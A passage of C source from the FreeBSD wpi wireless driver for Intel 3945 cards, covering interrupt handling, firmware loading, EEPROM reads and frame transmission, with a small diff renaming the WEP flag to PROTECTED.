} free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int wpi_shutdown(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); WPI_LOCK(sc); wpi_stop_locked(sc); wpi_unload_firmware(sc); WPI_UNLOCK(sc); return 0; } static int wpi_suspend(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int wpi_resume(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } /** * Called by net80211 when ever there is a change to 80211 state machine */ static int wpi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct wpi_vap *wvp = WPI_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; int error; DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate], sc->flags)); IEEE80211_UNLOCK(ic); WPI_LOCK(sc); if (nstate == IEEE80211_S_SCAN && vap->iv_state != IEEE80211_S_INIT) { /* * On !INIT -> SCAN transitions, we need to clear any possible * knowledge about associations. */ error = wpi_config(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: device config failed, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_AUTH || (nstate == IEEE80211_S_ASSOC && vap->iv_state == IEEE80211_S_RUN)) { /* * The node must be registered in the firmware before auth. * Also the associd must be cleared on RUN -> ASSOC * transitions. */ error = wpi_auth(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "%s: could not move to auth state, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_RUN) { error = wpi_run(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "%s: could not move to run state, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_RUN) { /* RUN -> RUN transition; just restart the timers */ wpi_calib_timeout(sc); /* XXX split out rate control timer */ } WPI_UNLOCK(sc); IEEE80211_LOCK(ic); return wvp->newstate(vap, nstate, arg); } /* * Grab exclusive access to NIC memory. */ static void wpi_mem_lock(struct wpi_softc *sc) { int ntries; uint32_t tmp; tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp | WPI_GPIO_MAC); /* spin until we actually get the lock */ for (ntries = 0; ntries < 100; ntries++) { if ((WPI_READ(sc, WPI_GPIO_CTL) & (WPI_GPIO_CLOCK | WPI_GPIO_SLEEP)) == WPI_GPIO_CLOCK) break; DELAY(10); } if (ntries == 100) device_printf(sc->sc_dev, "could not lock memory\n"); } /* * Release lock on NIC memory. */ static void wpi_mem_unlock(struct wpi_softc *sc) { uint32_t tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp & ~WPI_GPIO_MAC); } static uint32_t wpi_mem_read(struct wpi_softc *sc, uint16_t addr) { WPI_WRITE(sc, WPI_READ_MEM_ADDR, WPI_MEM_4 | addr); return WPI_READ(sc, WPI_READ_MEM_DATA); } static void wpi_mem_write(struct wpi_softc *sc, uint16_t addr, uint32_t data) { WPI_WRITE(sc, WPI_WRITE_MEM_ADDR, WPI_MEM_4 | addr); WPI_WRITE(sc, WPI_WRITE_MEM_DATA, data); } static void wpi_mem_write_region_4(struct wpi_softc *sc, uint16_t addr, const uint32_t *data, int wlen) { for (; wlen > 0; wlen--, data++, addr+=4) wpi_mem_write(sc, addr, *data); } /* * Read data from the EEPROM. We access EEPROM through the MAC instead of * using the traditional bit-bang method. Data is read up until len bytes have * been obtained. */ static uint16_t wpi_read_prom_data(struct wpi_softc *sc, uint32_t addr, void *data, int len) { int ntries; uint32_t val; uint8_t *out = data; wpi_mem_lock(sc); for (; len > 0; len -= 2, addr++) { WPI_WRITE(sc, WPI_EEPROM_CTL, addr << 2); for (ntries = 0; ntries < 10; ntries++) { if ((val = WPI_READ(sc, WPI_EEPROM_CTL)) & WPI_EEPROM_READY) break; DELAY(5); } if (ntries == 10) { device_printf(sc->sc_dev, "could not read EEPROM\n"); return ETIMEDOUT; } *out++= val >> 16; if (len > 1) *out ++= val >> 24; } wpi_mem_unlock(sc); return 0; } /* * The firmware text and data segments are transferred to the NIC using DMA. * The driver just copies the firmware into DMA-safe memory and tells the NIC * where to find it. Once the NIC has copied the firmware into its internal * memory, we can free our local copy in the driver. */ static int wpi_load_microcode(struct wpi_softc *sc, const uint8_t *fw, int size) { int error, ntries; DPRINTFN(WPI_DEBUG_HW,("Loading microcode size 0x%x\n", size)); size /= sizeof(uint32_t); wpi_mem_lock(sc); wpi_mem_write_region_4(sc, WPI_MEM_UCODE_BASE, (const uint32_t *)fw, size); wpi_mem_write(sc, WPI_MEM_UCODE_SRC, 0); wpi_mem_write(sc, WPI_MEM_UCODE_DST, WPI_FW_TEXT); wpi_mem_write(sc, WPI_MEM_UCODE_SIZE, size); /* run microcode */ wpi_mem_write(sc, WPI_MEM_UCODE_CTL, WPI_UC_RUN); /* wait while the adapter is busy copying the firmware */ for (error = 0, ntries = 0; ntries < 1000; ntries++) { uint32_t status = WPI_READ(sc, WPI_TX_STATUS); DPRINTFN(WPI_DEBUG_HW, ("firmware status=0x%x, val=0x%x, result=0x%x\n", status, WPI_TX_IDLE(6), status & WPI_TX_IDLE(6))); if (status & WPI_TX_IDLE(6)) { DPRINTFN(WPI_DEBUG_HW, ("Status Match! - ntries = %d\n", ntries)); break; } DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout transferring firmware\n"); error = ETIMEDOUT; } /* start the microcode executing */ wpi_mem_write(sc, WPI_MEM_UCODE_CTL, WPI_UC_ENABLE); wpi_mem_unlock(sc); return (error); } static void wpi_rx_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc, struct wpi_rx_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_rx_ring *ring = &sc->rxq; struct wpi_rx_stat *stat; struct wpi_rx_head *head; struct wpi_rx_tail *tail; struct ieee80211_node *ni; struct mbuf *m, *mnew; bus_addr_t paddr; int error; stat = (struct wpi_rx_stat *)(desc + 1); if (stat->len > WPI_STAT_MAXLEN) { device_printf(sc->sc_dev, "invalid rx statistic header\n"); ifp->if_ierrors++; return; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); head = (struct wpi_rx_head *)((caddr_t)(stat + 1) + stat->len); tail = (struct wpi_rx_tail *)((caddr_t)(head + 1) + le16toh(head->len)); DPRINTFN(WPI_DEBUG_RX, ("rx intr: idx=%d len=%d stat len=%d rssi=%d " "rate=%x chan=%d tstamp=%ju\n", ring->cur, le32toh(desc->len), le16toh(head->len), (int8_t)stat->rssi, head->rate, head->chan, (uintmax_t)le64toh(tail->tstamp))); /* discard Rx frames with bad CRC early */ if ((le32toh(tail->flags) & WPI_RX_NOERROR) != WPI_RX_NOERROR) { DPRINTFN(WPI_DEBUG_RX, ("%s: rx flags error %x\n", __func__, le32toh(tail->flags))); ifp->if_ierrors++; return; } if (le16toh(head->len) < sizeof (struct ieee80211_frame)) { DPRINTFN(WPI_DEBUG_RX, ("%s: frame too short: %d\n", __func__, le16toh(head->len))); ifp->if_ierrors++; return; } /* XXX don't need mbuf, just dma buffer */ mnew = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (mnew == NULL) { DPRINTFN(WPI_DEBUG_RX, ("%s: no mbuf to restock ring\n", __func__)); ifp->if_ierrors++; return; } bus_dmamap_unload(ring->data_dmat, data->map); error = bus_dmamap_load(ring->data_dmat, data->map, mtod(mnew, caddr_t), MJUMPAGESIZE, wpi_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(mnew); ifp->if_ierrors++; return; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); /* finalize mbuf and swap in new one */ m = data->m; m->m_pkthdr.rcvif = ifp; m->m_data = (caddr_t)(head + 1); m->m_pkthdr.len = m->m_len = le16toh(head->len); data->m = mnew; /* update Rx descriptor */ ring->desc[ring->cur] = htole32(paddr); if (ieee80211_radiotap_active(ic)) { struct wpi_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_chan_freq = htole16(ic->ic_channels[head->chan].ic_freq); tap->wr_chan_flags = htole16(ic->ic_channels[head->chan].ic_flags); tap->wr_dbm_antsignal = (int8_t)(stat->rssi - WPI_RSSI_OFFSET); tap->wr_dbm_antnoise = (int8_t)le16toh(stat->noise); tap->wr_tsft = tail->tstamp; tap->wr_antenna = (le16toh(head->flags) >> 4) & 0xf; switch (head->rate) { /* CCK rates */ case 10: tap->wr_rate = 2; break; case 20: tap->wr_rate = 4; break; case 55: tap->wr_rate = 11; break; case 110: tap->wr_rate = 22; break; /* OFDM rates */ case 0xd: tap->wr_rate = 12; break; case 0xf: tap->wr_rate = 18; break; case 0x5: tap->wr_rate = 24; break; case 0x7: tap->wr_rate = 36; break; case 0x9: tap->wr_rate = 48; break; case 0xb: tap->wr_rate = 72; break; case 0x1: tap->wr_rate = 96; break; case 0x3: tap->wr_rate = 108; break; /* unknown rate: should not happen */ default: tap->wr_rate = 0; } if (le16toh(head->flags) & 0x4) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; } WPI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, stat->rssi, 0); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, stat->rssi, 0); WPI_LOCK(sc); } static void wpi_tx_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc) { struct ifnet *ifp = sc->sc_ifp; struct wpi_tx_ring *ring = &sc->txq[desc->qid & 0x3]; struct wpi_tx_data *txdata = &ring->data[desc->idx]; struct wpi_tx_stat *stat = (struct wpi_tx_stat *)(desc + 1); struct ieee80211_node *ni = txdata->ni; struct ieee80211vap *vap = ni->ni_vap; int retrycnt = 0; DPRINTFN(WPI_DEBUG_TX, ("tx done: qid=%d idx=%d retries=%d nkill=%d " "rate=%x duration=%d status=%x\n", desc->qid, desc->idx, stat->ntries, stat->nkill, stat->rate, le32toh(stat->duration), le32toh(stat->status))); /* * Update rate control statistics for the node. * XXX we should not count mgmt frames since they're always sent at * the lowest available bit-rate. * XXX frames w/o ACK shouldn't be used either */ if (stat->ntries > 0) { DPRINTFN(WPI_DEBUG_TX, ("%d retries\n", stat->ntries)); retrycnt = 1; } ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); /* XXX oerrors should only count errors !maxtries */ if ((le32toh(stat->status) & 0xff) != 1) ifp->if_oerrors++; else ifp->if_opackets++; bus_dmamap_sync(ring->data_dmat, txdata->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, txdata->map); /* XXX handle M_TXCB? */ m_freem(txdata->m); txdata->m = NULL; ieee80211_free_node(txdata->ni); txdata->ni = NULL; ring->queued--; sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; wpi_start_locked(ifp); } static void wpi_cmd_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc) { struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_data *data; DPRINTFN(WPI_DEBUG_CMD, ("cmd notification qid=%x idx=%d flags=%x " "type=%s len=%d\n", desc->qid, desc->idx, desc->flags, wpi_cmd_str(desc->type), le32toh(desc->len))); if ((desc->qid & 7) != 4) return; /* not a command ack */ data = &ring->data[desc->idx]; /* if the command was mapped in a mbuf, free it */ if (data->m != NULL) { bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } sc->flags &= ~WPI_FLAG_BUSY; wakeup(&ring->cmd[desc->idx]); } static void wpi_notif_intr(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_rx_desc *desc; struct wpi_rx_data *data; uint32_t hw; bus_dmamap_sync(sc->shared_dma.tag, sc->shared_dma.map, BUS_DMASYNC_POSTREAD); hw = le32toh(sc->shared->next); while (sc->rxq.cur != hw) { data = &sc->rxq.data[sc->rxq.cur]; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); desc = (void *)data->m->m_ext.ext_buf; DPRINTFN(WPI_DEBUG_NOTIFY, ("notify qid=%x idx=%d flags=%x type=%d len=%d\n", desc->qid, desc->idx, desc->flags, desc->type, le32toh(desc->len))); if (!(desc->qid & 0x80)) /* reply to a command */ wpi_cmd_intr(sc, desc); switch (desc->type) { case WPI_RX_DONE: /* a 802.11 frame was received */ wpi_rx_intr(sc, desc, data); break; case WPI_TX_DONE: /* a 802.11 frame has been transmitted */ wpi_tx_intr(sc, desc); break; case WPI_UC_READY: { struct wpi_ucode_info *uc = (struct wpi_ucode_info *)(desc + 1); /* the microcontroller is ready */ DPRINTF(("microcode alive notification version %x " "alive %x\n", le32toh(uc->version), le32toh(uc->valid))); if (le32toh(uc->valid) != 1) { device_printf(sc->sc_dev, "microcontroller initialization failed\n"); wpi_stop_locked(sc); } break; } case WPI_STATE_CHANGED: { uint32_t *status = (uint32_t *)(desc + 1); /* enabled/disabled notification */ DPRINTF(("state changed to %x\n", le32toh(*status))); if (le32toh(*status) & 1) { device_printf(sc->sc_dev, "Radio transmitter is switched off\n"); sc->flags |= WPI_FLAG_HW_RADIO_OFF; ifp->if_drv_flags &= ~IFF_DRV_RUNNING; /* Disable firmware commands */ WPI_WRITE(sc, WPI_UCODE_SET, WPI_DISABLE_CMD); } break; } case WPI_START_SCAN: { #ifdef WPI_DEBUG struct wpi_start_scan *scan = (struct wpi_start_scan *)(desc + 1); #endif DPRINTFN(WPI_DEBUG_SCANNING, ("scanning channel %d status %x\n", scan->chan, le32toh(scan->status))); break; } case WPI_STOP_SCAN: { #ifdef WPI_DEBUG struct wpi_stop_scan *scan = (struct wpi_stop_scan *)(desc + 1); #endif struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(WPI_DEBUG_SCANNING, ("scan finished nchan=%d status=%d chan=%d\n", scan->nchan, scan->status, scan->chan)); sc->sc_scan_timer = 0; ieee80211_scan_next(vap); break; } case WPI_MISSED_BEACON: { struct wpi_missed_beacon *beacon = (struct wpi_missed_beacon *)(desc + 1); struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (le32toh(beacon->consecutive) >= vap->iv_bmissthreshold) { DPRINTF(("Beacon miss: %u >= %u\n", le32toh(beacon->consecutive), vap->iv_bmissthreshold)); ieee80211_beacon_miss(ic); } break; } } sc->rxq.cur = (sc->rxq.cur + 1) % WPI_RX_RING_COUNT; } /* tell the firmware what we have processed */ hw = (hw == 0) ? WPI_RX_RING_COUNT - 1 : hw - 1; WPI_WRITE(sc, WPI_RX_WIDX, hw & ~7); } static void wpi_intr(void *arg) { struct wpi_softc *sc = arg; uint32_t r; WPI_LOCK(sc); r = WPI_READ(sc, WPI_INTR); if (r == 0 || r == 0xffffffff) { WPI_UNLOCK(sc); return; } /* disable interrupts */ WPI_WRITE(sc, WPI_MASK, 0); /* ack interrupts */ WPI_WRITE(sc, WPI_INTR, r); if (r & (WPI_SW_ERROR | WPI_HW_ERROR)) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "fatal firmware error\n"); DPRINTFN(6,("(%s)\n", (r & WPI_SW_ERROR) ? "(Software Error)" : "(Hardware Error)")); if (vap != NULL) ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); sc->flags &= ~WPI_FLAG_BUSY; WPI_UNLOCK(sc); return; } if (r & WPI_RX_INTR) wpi_notif_intr(sc); if (r & WPI_ALIVE_INTR) /* firmware initialized */ wakeup(sc); /* re-enable interrupts */ if (sc->sc_ifp->if_flags & IFF_UP) WPI_WRITE(sc, WPI_MASK, WPI_INTR_MASK); WPI_UNLOCK(sc); } static uint8_t wpi_plcp_signal(int rate) { switch (rate) { /* CCK rates (returned values are device-dependent) */ case 2: return 10; case 4: return 20; case 11: return 55; case 22: return 110; /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ /* R1-R4 (ral/ural is R4-R1) */ case 12: return 0xd; case 18: return 0xf; case 24: return 0x5; case 36: return 0x7; case 48: return 0x9; case 72: return 0xb; case 96: return 0x1; case 108: return 0x3; /* unsupported rates (should not get there) */ default: return 0; } } /* quickly determine if a given rate is CCK or OFDM */ #define WPI_RATE_IS_OFDM(rate) ((rate) >= 12 && (rate) != 22) /* * Construct the data packet for a transmit buffer and acutally put * the buffer onto the transmit ring, kicking the card to process the * the buffer. */ static int wpi_tx_data(struct wpi_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct chanAccParams *cap = &ic->ic_wme.wme_chanParams; struct wpi_tx_ring *ring = &sc->txq[ac]; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_cmd_data *tx; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *mnew; int i, error, nsegs, rate, hdrlen, ismcast; bus_dma_segment_t segs[WPI_MAX_SCATTER]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; wh = mtod(m0, struct ieee80211_frame *); hdrlen = ieee80211_hdrsize(wh); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } cmd = &ring->cmd[ring->cur]; cmd->code = WPI_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct wpi_cmd_data *)cmd->data; tx->flags = htole32(WPI_TX_AUTO_SEQ); tx->timeout = htole16(0); tx->ofdm_mask = 0xff; tx->cck_mask = 0x0f; tx->lifetime = htole32(WPI_LIFETIME_INFINITE); tx->id = ismcast ? WPI_ID_BROADCAST : WPI_ID_BSS; tx->len = htole16(m0->m_pkthdr.len); if (!ismcast) { if ((ni->ni_flags & IEEE80211_NODE_QOS) == 0 || !cap->cap_wmeParams[ac].wmep_noackPolicy) tx->flags |= htole32(WPI_TX_NEED_ACK); if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) { tx->flags |= htole32(WPI_TX_NEED_RTS|WPI_TX_FULL_TXOP); tx->rts_ntries = 7; } } /* pick a rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* tell h/w to set timestamp in probe responses */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) tx->flags |= htole32(WPI_TX_INSERT_TSTAMP); if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); rate = tp->mgmtrate; } else if (ismcast) { rate = tp->mcastrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } tx->rate = wpi_plcp_signal(rate); /* be very persistant at sending frames out */ #if 0 tx->data_ntries = tp->maxretry; #else tx->data_ntries = 15; /* XXX way too high */ #endif if (ieee80211_radiotap_active_vap(vap)) { struct wpi_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_hwqueue = ac; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) tap->wt_flags |= IEEE80211_RADIOTAP_F_WEP; ieee80211_radiotap_tx(vap, m0); } /* save and trim IEEE802.11 header */ m_copydata(m0, 0, hdrlen, (caddr_t)&tx->wh); m_adj(m0, hdrlen); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { /* XXX use m_collapse */ mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } data->m = m0; data->ni = ni; DPRINTFN(WPI_DEBUG_TX, ("sending data: qid=%d idx=%d len=%d nsegs=%d\n", ring->qid, ring->cur, m0->m_pkthdr.len, nsegs)); /* first scatter/gather segment is used by the tx data command */ desc->flags = htole32(WPI_PAD32(m0->m_pkthdr.len) << 28 | (1 + nsegs) << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + sizeof (struct wpi_cmd_data)); for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(segs[i - 1].ds_addr); desc->segs[i].len = htole32(segs[i - 1].ds_len); } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); ring->queued++; /* kick ring */ ring->cur = (ring->cur + 1) % WPI_TX_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); return 0; } /** * Process data waiting to be sent on the IFNET output queue */ static void wpi_start(struct ifnet *ifp) { struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); wpi_start_locked(ifp); WPI_UNLOCK(sc); } static void wpi_start_locked(struct ifnet *ifp) { struct wpi_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; int ac; WPI_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued > sc->txq[ac].count - 8) { /* there is no place left in this ring */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (wpi_tx_data(sc, m, ni, ac) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static int wpi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } WPI_LOCK(sc); /* management frames go into ring 0 */ if (sc->txq[0].queued > sc->txq[0].count - 8) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m); WPI_UNLOCK(sc); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; if (wpi_tx_data(sc, m, ni, 0) != 0) goto bad; sc->sc_tx_timer = 5; callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); WPI_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; WPI_UNLOCK(sc); ieee80211_free_node(ni); return EIO; /* XXX */ } static int wpi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct wpi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: WPI_LOCK(sc); if ((ifp->if_flags & IFF_UP)) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { wpi_init_locked(sc, 0); startall = 1; } } else if ((ifp->if_drv_flags & IFF_DRV_RUNNING) || (sc->flags & WPI_FLAG_HW_RADIO_OFF)) wpi_stop_locked(sc); WPI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } /* * Extract various information from EEPROM. */ static void wpi_read_eeprom(struct wpi_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int i; /* read the hardware capabilities, revision and SKU type */ wpi_read_prom_data(sc, WPI_EEPROM_CAPABILITIES, &sc->cap,1); wpi_read_prom_data(sc, WPI_EEPROM_REVISION, &sc->rev,2); wpi_read_prom_data(sc, WPI_EEPROM_TYPE, &sc->type, 1); /* read the regulatory domain */ wpi_read_prom_data(sc, WPI_EEPROM_DOMAIN, sc->domain, 4); /* read in the hw MAC address */ wpi_read_prom_data(sc, WPI_EEPROM_MAC, macaddr, 6); /* read the list of authorized channels */ for (i = 0; i < WPI_CHAN_BANDS_COUNT; i++) wpi_read_eeprom_channels(sc,i); /* read the power level calibration info for each group */ for (i = 0; i < WPI_POWER_GROUPS_COUNT; i++) wpi_read_eeprom_group(sc,i); } /* * Send a command to the firmware. */ static int wpi_cmd(struct wpi_softc *sc, int code, const void *buf, int size, int async) { struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_cmd *cmd; #ifdef WPI_DEBUG if (!async) { WPI_LOCK_ASSERT(sc); } #endif DPRINTFN(WPI_DEBUG_CMD,("wpi_cmd %d size %d async %d\n", code, size, async)); if (sc->flags & WPI_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: cmd %d not sent, busy\n", __func__, code); return EAGAIN; } sc->flags|= WPI_FLAG_BUSY; KASSERT(size <= sizeof cmd->data, ("command %d too large: %d bytes", code, size)); desc = &ring->desc[ring->cur]; cmd = &ring->cmd[ring->cur]; cmd->code = code; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; memcpy(cmd->data, buf, size); desc->flags = htole32(WPI_PAD32(size) << 28 | 1 << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + size); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); if (async) { sc->flags &= ~ WPI_FLAG_BUSY; return 0; } return msleep(cmd, &sc->sc_mtx, PCATCH, "wpicmd", hz); } static int wpi_wme_update(struct ieee80211com *ic) { #define WPI_EXP2(v) htole16((1 << (v)) - 1) #define WPI_USEC(v) htole16(IEEE80211_TXOP_TO_US(v)) struct wpi_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; struct wpi_wme_setup wme; int ac; /* don't override default WME values if WME is not actually enabled */ if (!(ic->ic_flags & IEEE80211_F_WME)) return 0; wme.flags = 0; for (ac = 0; ac < WME_NUM_AC; ac++) { wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; wme.ac[ac].aifsn = wmep->wmep_aifsn; wme.ac[ac].cwmin = WPI_EXP2(wmep->wmep_logcwmin); wme.ac[ac].cwmax = WPI_EXP2(wmep->wmep_logcwmax); wme.ac[ac].txop = WPI_USEC(wmep->wmep_txopLimit); DPRINTF(("setting WME for queue %d aifsn=%d cwmin=%d cwmax=%d " "txop=%d\n", ac, wme.ac[ac].aifsn, wme.ac[ac].cwmin, wme.ac[ac].cwmax, wme.ac[ac].txop)); } return wpi_cmd(sc, WPI_CMD_SET_WME, &wme, sizeof wme, 1); #undef WPI_USEC #undef WPI_EXP2 } /* * Configure h/w multi-rate retries. */ static int wpi_mrr_setup(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_mrr_setup mrr; int i, error; memset(&mrr, 0, sizeof (struct wpi_mrr_setup)); /* CCK rates (not used with 802.11a) */ for (i = WPI_CCK1; i <= WPI_CCK11; i++) { mrr.rates[i].flags = 0; mrr.rates[i].signal = wpi_ridx_to_plcp[i]; /* fallback to the immediate lower CCK rate (if any) */ mrr.rates[i].next = (i == WPI_CCK1) ? WPI_CCK1 : i - 1; /* try one time at this rate before falling back to "next" */ mrr.rates[i].ntries = 1; } /* OFDM rates (not used with 802.11b) */ for (i = WPI_OFDM6; i <= WPI_OFDM54; i++) { mrr.rates[i].flags = 0; mrr.rates[i].signal = wpi_ridx_to_plcp[i]; /* fallback to the immediate lower OFDM rate (if any) */ /* we allow fallback from OFDM/6 to CCK/2 in 11b/g mode */ mrr.rates[i].next = (i == WPI_OFDM6) ? 